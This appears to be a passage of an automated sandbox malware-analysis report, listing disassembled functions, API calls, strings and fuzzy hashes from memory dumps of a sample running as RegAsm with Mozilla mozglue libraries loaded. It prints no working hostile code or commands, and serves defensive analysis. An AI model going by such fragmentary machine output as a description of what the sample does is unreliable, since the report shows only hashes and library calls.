                                                                                    • Instruction Fuzzy Hash: C6112B31308224DBDB249E1A9C41A26B3A5EB95714F100D3FF852AB3C1D7F9D850C79E
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentmemcpystd::_
                                                                                    • String ID: string too long
                                                                                    • API String ID: 1835169507-2556327735
                                                                                    • Opcode ID: 1ae9b9da084d651e158c9e0c2e379de5b2550a5b38189eb17f699b20abe3d51a
                                                                                    • Instruction ID: 7a39a1a5c8fbacd7e86885b53ed3bafa5cc60d979cb7bbd29f82b024e86b4f4c
                                                                                    • Opcode Fuzzy Hash: 1ae9b9da084d651e158c9e0c2e379de5b2550a5b38189eb17f699b20abe3d51a
                                                                                    • Instruction Fuzzy Hash: 2E110B313006109BDB349F6EC940A6BB7A9EF41754B10093FF443AB2C1CBBADC198799
                                                                                    APIs
                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC73D19
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6CC73D6C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errnomozalloc_abort
                                                                                    • String ID: d
                                                                                    • API String ID: 3471241338-2564639436
                                                                                    • Opcode ID: 416bca0af1ac61ca75d065cc2e30dede65d3ea21d00a79466742252f954214e0
                                                                                    • Instruction ID: 59cc09f05beffdbb9a0374653c439a6db4443a2522b4601e42e9718ab6cda2e4
                                                                                    • Opcode Fuzzy Hash: 416bca0af1ac61ca75d065cc2e30dede65d3ea21d00a79466742252f954214e0
                                                                                    • Instruction Fuzzy Hash: 6711E335E14688DBDB109BADD9184EDB775EFA6318B48835DEC459B602FB30A9C4C3A0
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040DCAE
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                      • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                    • memmove.MSVCRT ref: 0040DCE7
                                                                                    Strings
                                                                                    • invalid string position, xrefs: 0040DCA9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                    • String ID: invalid string position
                                                                                    • API String ID: 1659287814-1799206989
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetNtLoaderAPI
                                                                                    • API String ID: 1646373207-1628273567
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC96E22
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC96E3F
                                                                                    Strings
                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC96E1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footergetenv
                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                    • API String ID: 1472356752-1153589363
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC49EEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: Infinity$NaN
                                                                                    • API String ID: 1385522511-4285296124
                                                                                    APIs
                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC4BEE3
                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC4BEF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                    • String ID: cryptbase.dll
                                                                                    • API String ID: 4137859361-1262567842
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC3510A
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC35167
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6CC35196
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C), ref: 6CC35234
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70918
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC709A6
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC,?,00000000), ref: 6CC709F3
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70ACB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3168844106-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B628
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B67D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B708
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC8B127,?,?,?,?,?,?,?,?), ref: 6CC8B74D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC7FF2A), ref: 6CC8DFFD
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E04A
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E0C0
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC7FF2A), ref: 6CC8E0FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC86EAB
                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC86EFA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC86F1E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC86F5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: malloc$freememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 4259248891-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B5EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B623
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B66C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B67F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$free
                                                                                    • String ID:
                                                                                    • API String ID: 1480856625-0
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F611
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F623
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F652
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F668
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free
                                                                                    • String ID:
                                                                                    • API String ID: 1294909896-0